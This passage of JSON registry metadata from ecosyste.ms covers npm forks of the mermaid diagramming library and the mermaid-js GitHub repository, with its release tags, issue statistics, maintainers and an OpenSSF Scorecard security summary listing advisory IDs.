ad.github.com/mermaid-js/mermaid/tar.gz/0.2.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.2/manifests"},{"name":"0.2.1","sha":"c0a4cfc2d768a7fe0a5d442635b7590054577eeb","kind":"commit","published_at":"2014-11-22T17:36:02.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.1/manifests"},{"name":"0.2.0","sha":"83de219552e39f8ed19a2300f215e1159abcfb33","kind":"commit","published_at":"2014-11-22T16:29:05.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.0/manifests"},{"name":"0.1.1","sha":"64bedc8262b6e116c344de10968e78a06323d304","kind":"commit","published_at":"2014-11-17T06:50:42.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.1.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.1.1/manifests"},{"name":"0.1.0","sha":"46b45a820976091d3dcf1d99c6a4e8a35e7d9ade","kind":"tag","published_at":"2014-11-16T19:32:58.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.1.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.1.0/manifests"}]},"repo_metadata_updated_at":"2025-09-01T14:17:51.327Z","dependent_packages_count":0,"downloads":5,"downloads_period":"last-month","dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":25.47369502133176,"dependent_packages_count":36.88144446039712,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":31.177569740864442},"purl":"pkg:npm/%40ted-marozzi/layout-elk","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/@ted-marozzi/layout-elk","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/npm/@ted-marozzi/layout-elk","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/@ted-marozzi/layout-elk/dependencies","status":null,"funding_links":["https://github.com/sponsors/knsv","https://github.com/sponsors/sidharthv96"],"critical":null,"issue_metadata":{"last_synced_at":"2025-09-01T14:01:58.757Z","issues_count":1461,"pull_requests_count":1558,"avg_time_to_close_issue":27677984.852564104,"avg_time_to_close_pull_request":2277072.9893004117,"issues_closed_count":466,"pull_requests_closed_count":1215,"pull_request_authors_count":359,"issue_authors_count":1156,"avg_comments_per_issue":3.5578370978781657,"avg_comments_per_pull_request":4.093709884467266,"merged_pull_requests_count":970,"bot_issues_count":4,"bot_pull_requests_count":290,"past_year_issues_count":428,"past_year_pull_requests_count":712,"past_year_avg_time_to_close_issue":2790098.3866666667,"past_year_avg_time_to_close_pull_request":1391392.070539419,"past_year_issues_closed_count":75,"past_year_pull_requests_closed_count":482,"past_year_pull_request_authors_count":162,"past_year_issue_authors_count":345,"past_year_avg_comments_per_issue":0.7616822429906542,"past_year_avg_comments_per_pull_request":4.254213483146067,"past_year_bot_issues_count":2,"past_year_bot_pull_requests_count":155,"past_year_merged_pull_requests_count":374,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/issues","maintainers":[{"login":"sidharthv96","count":251,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sidharthv96"},{"login":"huynhicode","count":72,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huynhicode"},{"login":"knsv","count":57,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/knsv"},{"login":"aloisklink","count":37,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aloisklink"},{"login":"Yokozuna59","count":27,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Yokozuna59"},{"login":"saurabhg772244","count":25,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/saurabhg772244"},{"login":"ashishjain0512","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashishjain0512"},{"login":"yari-dewalt","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/yari-dewalt"},{"login":"Yash-Singh1","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Yash-Singh1"},{"login":"omkarht","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/omkarht"},{"login":"rajat-ht","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/rajat-ht"},{"login":"NicolasNewman","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/NicolasNewman"},{"login":"shubhamparikh2704","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shubhamparikh2704"},{"login":"IOrlandoni","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/IOrlandoni"},{"login":"GDFaber","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/GDFaber"},{"login":"shubham-mermaid","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shubham-mermaid"},{"login":"kedar49","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kedar49"},{"login":"ferozmht","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ferozmht"},{"login":"darshanr0107","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/darshanr0107"},{"login":"Prashant-7718","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Prashant-7718"},{"login":"tylerlong","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/tylerlong"}],"active_maintainers":[{"login":"sidharthv96","count":48,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sidharthv96"},{"login":"knsv","count":31,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/knsv"},{"login":"saurabhg772244","count":25,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/saurabhg772244"},{"login":"huynhicode","count":22,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huynhicode"},{"login":"ashishjain0512","count":17,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashishjain0512"},{"login":"yari-dewalt","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/yari-dewalt"},{"login":"aloisklink","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aloisklink"},{"login":"omkarht","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/omkarht"},{"login":"rajat-ht","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/rajat-ht"},{"login":"shubhamparikh2704","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shubhamparikh2704"},{"login":"NicolasNewman","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/NicolasNewman"},{"login":"IOrlandoni","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/IOrlandoni"},{"login":"kedar49","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kedar49"},{"login":"shubham-mermaid","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shubham-mermaid"},{"login":"darshanr0107","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/darshanr0107"},{"login":"Prashant-7718","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Prashant-7718"},{"login":"ferozmht","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ferozmht"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@ted-marozzi%2Flayout-elk/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@ted-marozzi%2Flayout-elk/version_numbers","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@ted-marozzi%2Flayout-elk/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@ted-marozzi%2Flayout-elk/related_packages","maintainers":[{"uuid":"ted-marozzi","login":"ted-marozzi","name":null,"email":"marozzi.t@gmail.com","url":null,"packages_count":2,"html_url":"https://www.npmjs.com/~ted-marozzi","role":null,"created_at":"2024-11-29T12:58:02.842Z","updated_at":"2024-11-29T12:58:02.842Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/ted-marozzi/packages"}],"registry":{"name":"npmjs.org","url":"https://registry.npmjs.org","ecosystem":"npm","default":true,"packages_count":5131348,"maintainers_count":1051627,"namespaces_count":313328,"keywords_count":730052,"github":"npm","metadata":{"funded_packages_count":155759},"icon_url":"https://github.com/npm.png","created_at":"2022-04-04T15:19:23.081Z","updated_at":"2025-09-05T07:36:50.205Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/namespaces"}},{"id":8623848,"name":"@ted-marozzi/mermaid","ecosystem":"npm","description":"Markdown-ish syntax for generating flowcharts, mindmaps, sequence diagrams, class diagrams, gantt charts, git graphs and more.","homepage":"https://github.com/mermaid-js/mermaid#readme","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/mermaid-js/mermaid","keywords_array":["diagram","markdown","flowchart","sequence diagram","gantt","class diagram","git graph","mindmap","packet diagram","c4 diagram","er diagram","pie chart","pie diagram","quadrant chart","requirement diagram","graph"],"namespace":"ted-marozzi","versions_count":93,"first_release_published_at":"2023-12-06T11:02:59.840Z","latest_release_published_at":"2023-12-06T10:48:27.431Z","latest_release_number":"10.6.1","last_synced_at":"2025-09-01T12:56:00.405Z","created_at":"2023-12-06T11:58:39.693Z","updated_at":"2025-09-01T14:17:51.373Z","registry_url":"https://www.npmjs.com/package/@ted-marozzi/mermaid","install_command":"npm install @ted-marozzi/mermaid","documentation_url":null,"metadata":{"funding":null,"dist-tags":{"latest":"11.4.0-pro.42"}},"repo_metadata":{"id":37269779,"uuid":"26066727","full_name":"mermaid-js/mermaid","owner":"mermaid-js","description":"Generation of diagrams like flowcharts or sequence diagrams from text in a similar manner as markdown","archived":false,"fork":false,"pushed_at":"2025-09-01T12:33:10.000Z","size":254429,"stargazers_count":82566,"open_issues_count":1425,"forks_count":7984,"subscribers_count":651,"default_branch":"develop","last_synced_at":"2025-09-01T12:37:01.437Z","etag":null,"topics":["diagrams","diagrams-as-code","documentation","flowchart","javascript","mindmap","typescript","uml-diagrams"],"latest_commit_sha":null,"homepage":"https://mermaid.js.org","language":"TypeScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/mermaid-js.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":"CONTRIBUTING.md","funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":"CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":"CITATION.cff","codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"github":["knsv","sidharthv96"]}},"created_at":"2014-11-01T23:52:32.000Z","updated_at":"2025-09-01T12:31:32.000Z","dependencies_parsed_at":"2023-09-29T07:58:18.084Z","dependency_job_id":"8c149ccb-df9c-4cb4-9e51-2f99157720cd","html_url":"https://github.com/mermaid-js/mermaid","commit_stats":{"total_commits":8230,"total_committers":688,"mean_commits":"11.962209302325581","dds":0.823086269744836,"last_synced_commit":"b3dee343d1536c8425539643c345a63ff58f59f4"},"previous_names":["knsv/mermaid"],"tags_count":181,"template":false,"template_full_name":null,"purl":"pkg:github/mermaid-js/mermaid","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/mermaid-js","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/refs/heads/develop","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/sbom","scorecard":{"id":355670,"data":{"date":"2025-08-17T15:35:22Z","repo":{"name":"github.com/mermaid-js/mermaid","commit":"1f46c9e9bb556f9c321118407d0fa6788746e8b9"},"scorecard":{"version":"v5.1.1","commit":"cd152cb6742c5b8f2f3d2b5193b41d9c50905198"},"score":6.7,"checks":[{"name":"Dependency-Update-Tool","score":10,"reason":"update tool detected","details":["Info: detected update tool: RenovateBot: renovate.json:1"],"documentation":{"short":"Determines if the project uses a dependency update tool.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#dependency-update-tool"}},{"name":"Maintained","score":10,"reason":"30 commit(s) and 7 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#maintained"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#dangerous-workflow"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#packaging"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#code-review"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#binary-artifacts"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Info: jobLevel 'actions' permission set to 'read': .github/workflows/codeql.yml:22","Info: jobLevel 'contents' permission set to 'read': .github/workflows/codeql.yml:23","Info: jobLevel 'contents' permission set to 'read': .github/workflows/link-checker.yml:30","Info: jobLevel 'contents' permission set to 'read': .github/workflows/pr-labeler.yml:21","Info: jobLevel 'contents' permission set to 'read': .github/workflows/release-preview.yml:21","Warn: jobLevel 'contents' permission set to 'write': .github/workflows/release.yml:17","Info: topLevel 'contents' permission set to 'read': .github/workflows/autofix.yml:8","Info: topLevel 'contents' permission set to 'read': .github/workflows/build-docs.yml:14","Info: topLevel 'contents' permission set to 'read': .github/workflows/check-readme-in-sync.yml:14","Info: topLevel 'contents' permission set to 'read': .github/workflows/codeql.yml:15","Info: topLevel 'contents' permission set to 'read': .github/workflows/dependency-review.yml:11","Info: topLevel 'contents' permission set to 'read': .github/workflows/e2e-applitools.yml:17","Warn: topLevel 'contents' permission set to 'write': .github/workflows/e2e-timings.yml:13","Info: topLevel 'contents' permission set to 'read': .github/workflows/e2e.yml:15","Info: topLevel 'contents' permission set to 'read': .github/workflows/issue-triage.yml:8","Info: topLevel 'contents' permission set to 'read': .github/workflows/link-checker.yml:23","Warn: topLevel 'contents' permission set to 'write': .github/workflows/lint.yml:12","Info: topLevel 'contents' permission set to 'read': .github/workflows/pr-labeler.yml:15","Info: topLevel 'contents' permission set to 'read': .github/workflows/publish-docs.yml:11","Warn: no topLevel permission defined: .github/workflows/release-preview-publish.yml:1","Warn: topLevel 'actions' permission set to 'write': .github/workflows/release-preview.yml:14","Info: topLevel 'contents' permission set to 'read': .github/workflows/release-preview.yml:13","Info: topLevel 'contents' permission set to 'read': .github/workflows/release.yml:11","Info: topLevel permissions set to 'read-all': .github/workflows/scorecard.yml:9","Info: topLevel 'contents' permission set to 'read': .github/workflows/test.yml:6","Warn: no topLevel permission defined: .github/workflows/unlock-reopened-issues.yml:1","Warn: no topLevel permission defined: .github/workflows/update-browserlist.yml:1","Warn: no topLevel permission defined: .github/workflows/validate-lockfile.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#token-permissions"}},{"name":"Pinned-Dependencies","score":9,"reason":"dependency not pinned by hash detected -- score normalized to 9","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/validate-lockfile.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/mermaid-js/mermaid/validate-lockfile.yml/develop?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/validate-lockfile.yml:20: update your workflow using https://app.stepsecurity.io/secureworkflow/mermaid-js/mermaid/validate-lockfile.yml/develop?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/validate-lockfile.yml:60: update your workflow using https://app.stepsecurity.io/secureworkflow/mermaid-js/mermaid/validate-lockfile.yml/develop?enable=pin","Warn: npmCommand not pinned by hash: .github/workflows/release-preview-publish.yml:32","Info:  45 out of  47 GitHub-owned GitHubAction dependencies pinned","Info:  35 out of  36 third-party GitHubAction dependencies pinned","Info:   1 out of   1 containerImage dependencies pinned","Info:   0 out of   1 npmCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#cii-best-practices"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#signed-releases"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#fuzzing"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#license"}},{"name":"SAST","score":9,"reason":"SAST tool detected but not run on all commits","details":["Info: SAST configuration detected: CodeQL","Warn: 28 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#sast"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: github.com/mermaid-js/.github/SECURITY.md:1","Info: Found linked content: github.com/mermaid-js/.github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: github.com/mermaid-js/.github/SECURITY.md:1","Info: Found text in security policy: github.com/mermaid-js/.github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#security-policy"}},{"name":"Branch-Protection","score":1,"reason":"branch protection is not maximal on development and all release branches","details":["Warn: branch protection not enabled for branch 'release/10.9.3'","Warn: branch protection not enabled for branch 'release/10.9.2'","Info: 'allow deletion' disabled on branch 'develop'","Info: 'force pushes' disabled on branch 'develop'","Warn: branch 'develop' does not require approvers","Warn: codeowners review is not required on branch 'develop'","Info: status check found to merge onto on branch 'develop'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#branch-protection"}},{"name":"CI-Tests","score":9,"reason":"11 out of 12 merged PRs checked by a CI test -- score normalized to 9","details":null,"documentation":{"short":"Determines if the project runs tests before pull requests are merged.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#ci-tests"}},{"name":"Contributors","score":10,"reason":"project has 15 contributing companies or organizations","details":["Info: found contributions from: Mermaid-Chart, OSDKDev, argoproj, check-spelling, evolutionizer, fossgect, garnercorp, gecthrissur, john deere, mermaid chart, mermaid-chart, mermaid-js, plantuml-stdlib, ringcentral, sarva"],"documentation":{"short":"Determines if the project has a set of contributors from multiple organizations (e.g., companies).","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#contributors"}},{"name":"Vulnerabilities","score":0,"reason":"23 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-968p-4wvh-cqc8","Warn: Project is vulnerable to: GHSA-xffm-g5w8-qvg7","Warn: Project is vulnerable to: GHSA-jr5f-v2jv-69x6","Warn: Project is vulnerable to: GHSA-v6h2-p8h4-qcjw","Warn: Project is vulnerable to: GHSA-pxg6-pf52-xh8x","Warn: Project is vulnerable to: GHSA-3xgq-45jj-v275","Warn: Project is vulnerable to: GHSA-67mh-4wv8-2f99","Warn: Project is vulnerable to: GHSA-mg2h-6x62-wpwc","Warn: Project is vulnerable to: GHSA-fjxv-7rqg-78g4","Warn: Project is vulnerable to: GHSA-4www-5p9h-95mh","Warn: Project is vulnerable to: GHSA-9gqv-wp59-fq42","Warn: Project is vulnerable to: GHSA-76c9-3jph-rj3q","Warn: Project is vulnerable to: GHSA-rhx6-c78j-4q9w","Warn: Project is vulnerable to: GHSA-52f5-9888-hmc6","Warn: Project is vulnerable to: GHSA-c76h-2ccp-4975","Warn: Project is vulnerable to: GHSA-cxrh-j4jr-qwg3","Warn: Project is vulnerable to: GHSA-x574-m823-4x7w","Warn: Project is vulnerable to: GHSA-4r4m-qw57-chr8","Warn: Project is vulnerable to: GHSA-xcj6-pq6g-qj4x","Warn: Project is vulnerable to: GHSA-356w-63v5-8wf4","Warn: Project is vulnerable to: GHSA-859w-5945-r5v3","Warn: Project is vulnerable to: GHSA-4v9v-hfq4-rm2v","Warn: Project is vulnerable to: GHSA-9jgg-88mc-972h"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T09:31:17.427Z","repository_id":37269779,"created_at":"2025-08-18T09:31:17.427Z","updated_at":"2025-08-18T09:31:17.427Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":273137429,"owners_count":25052011,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","status":"online","status_checked_at":"2025-09-01T02:00:09.058Z","response_time":120,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"mermaid-js","name":"mermaid-js","uuid":"57169982","kind":"organization","description":"","email":null,"website":null,"location":null,"twitter":"mermaidjs_","company":null,"icon_url":"https://avatars.githubusercontent.com/u/57169982?v=4","repositories_count":11,"last_synced_at":"2023-04-08T11:47:59.066Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/mermaid-js","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-14T05:34:15.747Z","updated_at":"2023-04-08T11:47:59.094Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/mermaid-js","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/mermaid-js/repositories"},"tags":[{"name":"mermaid@11.10.1","sha":"af3bbdc5919e5b7d4678946a78c2034885f794ad","kind":"tag","published_at":"2025-08-22T12:08:19.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.10.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.10.1/manifests"},{"name":"@mermaid-js/tiny@11.10.1","sha":"af3bbdc5919e5b7d4678946a78c2034885f794ad","kind":"tag","published_at":"2025-08-22T12:08:19.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/tiny@11.10.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/tiny@11.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Ftiny%4011.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.10.1/manifests"},{"name":"v10.9.4","sha":"80dcf2eaad5b484ea41b5e0a8aee3fa8c5b99d34","kind":"commit","published_at":"2025-08-19T08:40:15.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.9.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.4/manifests"},{"name":"mermaid@11.10.0","sha":"96778f77898c02489ba0d33c874eca4370e21205","kind":"tag","published_at":"2025-08-19T08:05:08.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.10.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.10.0","manifest